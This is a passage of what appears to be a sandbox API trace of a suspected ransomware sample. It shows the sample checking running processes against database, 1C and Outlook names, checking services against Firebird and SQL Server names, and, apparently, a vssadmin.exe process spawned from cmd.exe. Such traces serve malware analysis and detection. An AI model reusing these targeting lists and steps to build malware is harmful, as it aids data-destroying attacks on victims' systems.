lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0266.886] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0266.886] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0266.886] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0266.886] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0266.887] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0266.887] lstrlenW (lpString="lsass.exe") returned 9 [0266.887] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0266.887] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0266.887] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0266.887] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0266.887] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0266.887] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0266.887] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0266.887] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0266.887] lstrlenW (lpString="lsm.exe") returned 7 [0266.887] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0266.887] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0266.887] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0266.887] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0266.888] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0266.888] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0266.888] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0266.888] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.888] lstrlenW (lpString="svchost.exe") returned 11 [0266.888] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.888] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.888] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.888] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.888] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.888] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.888] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.888] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.889] lstrlenW (lpString="svchost.exe") returned 11 [0266.889] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.889] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.889] lstrlenW (lpString="svchost.exe") returned 11 [0266.889] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.889] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.889] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.890] lstrlenW (lpString="svchost.exe") returned 11 [0266.890] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.890] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.890] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.890] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.890] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.890] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.890] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.890] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.890] lstrlenW (lpString="svchost.exe") returned 11 [0266.890] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.890] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.890] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.891] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.891] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.891] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.891] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.891] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0266.891] lstrlenW (lpString="audiodg.exe") returned 11 [0266.891] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0266.891] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0266.891] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0266.891] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0266.891] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0266.891] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0266.891] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0266.891] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.891] lstrlenW (lpString="svchost.exe") returned 11 [0266.892] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.892] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.892] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.892] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.892] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.892] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.892] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.892] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0266.892] lstrlenW (lpString="userinit.exe") returned 12 [0266.892] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0266.892] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0266.892] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0266.892] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0266.892] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0266.892] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0266.892] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0266.892] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0266.893] lstrlenW (lpString="explorer.exe") returned 12 [0266.893] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0266.893] lstrlenW (lpString="dwm.exe") returned 7 [0266.893] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.893] lstrlenW (lpString="svchost.exe") returned 11 [0266.893] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0266.894] lstrlenW (lpString="agent1c.exe") returned 11 [0266.894] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0266.894] lstrlenW (lpString="spoolsv.exe") returned 11 [0266.894] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0266.894] lstrlenW (lpString="reader_sl.exe") returned 13 [0266.894] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0266.895] lstrlenW (lpString="dllhost.exe") returned 11 [0266.895] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0266.895] lstrlenW (lpString="taskhost.exe") returned 12 [0266.895] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.895] lstrlenW (lpString="svchost.exe") returned 11 [0266.895] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0266.896] lstrlenW (lpString="cmd.exe") returned 7 [0266.896] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x628, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0266.896] lstrlenW (lpString="conhost.exe") returned 11 [0266.896] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x610, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0266.897] lstrlenW (lpString="vssadmin.exe") returned 12 [0266.897] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x610, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0266.897] CloseHandle (hObject=0x310) returned 1 [0266.897] Sleep (dwMilliseconds=0x1f4) [0267.521] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42dc420 [0267.900] EnumServicesStatusExW (in: hSCManager=0x42dc420, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0267.900] GetLastError () returned 0xea [0267.900] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa64) returned 0x42dd078 [0267.900] EnumServicesStatusExW (in: hSCManager=0x42dc420, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x42dd078, cbBufSize=0xa64, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x42dd078, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0267.900] CloseServiceHandle (hSCObject=0x42dc420) returned 1 [0267.900] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0267.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0267.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0267.900] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0267.900] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0267.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0267.900] lstrlenW (lpString="AudioSrv") returned 8 [0267.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0267.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0267.901] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0267.901] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0267.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0267.901] lstrlenW (lpString="BFE") returned 3 [0267.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0267.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0267.901] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0267.901] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0267.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0267.901] lstrlenW (lpString="CscService") returned 10 [0267.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0267.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0267.901] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0267.901] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0267.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0267.901] lstrlenW (lpString="DcomLaunch") returned 10 [0267.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0267.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0267.901] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0267.901] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0267.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0267.901] lstrlenW (lpString="Dhcp") returned 4 [0267.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0267.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0267.901] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0267.901] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0267.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0267.901] lstrlenW (lpString="Dnscache") returned 8 [0267.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0267.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0267.901] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0267.902] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0267.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0267.902] lstrlenW (lpString="eventlog") returned 8 [0267.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0267.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0267.902] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0267.902] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0267.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0267.902] lstrlenW (lpString="EventSystem") returned 11 [0267.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0267.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0267.902] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0267.902] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0267.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0267.902] lstrlenW (lpString="gpsvc") returned 5 [0267.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0267.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0267.902] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0267.902] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0267.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0267.902] lstrlenW (lpString="lmhosts") returned 7 [0267.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0267.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0267.902] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0267.902] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0267.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0267.902] lstrlenW (lpString="MMCSS") returned 5 [0267.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0267.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0267.902] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0267.902] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0267.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0267.902] lstrlenW (lpString="MpsSvc") returned 6 [0267.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0267.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0267.903] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0267.903] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0267.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0267.903] lstrlenW (lpString="nsi") returned 3 [0267.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0267.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0267.903] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0267.903] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0267.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0267.903] lstrlenW (lpString="PlugPlay") returned 8 [0267.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0267.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0267.903] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0267.903] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0267.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0267.903] lstrlenW (lpString="Power") returned 5 [0267.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0267.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0267.903] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0267.903] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0267.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0267.903] lstrlenW (lpString="ProfSvc") returned 7 [0267.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0267.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0267.903] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0267.903] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0267.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0267.903] lstrlenW (lpString="RpcEptMapper") returned 12 [0267.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0267.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0267.904] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0267.904] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0267.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0267.904] lstrlenW (lpString="RpcSs") returned 5 [0267.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0267.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0267.904] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0267.904] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0267.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0267.904] lstrlenW (lpString="SamSs") returned 5 [0267.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0267.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0267.904] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0267.904] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0267.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0267.904] lstrlenW (lpString="Schedule") returned 8 [0267.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0267.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0267.904] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0267.904] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0267.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0267.904] lstrlenW (lpString="SENS") returned 4 [0267.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0267.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0267.904] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0267.904] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0267.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0267.905] lstrlenW (lpString="ShellHWDetection") returned 16 [0267.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0267.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0267.905] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0267.905] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0267.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0267.905] lstrlenW (lpString="Spooler") returned 7 [0267.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0267.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0267.905] 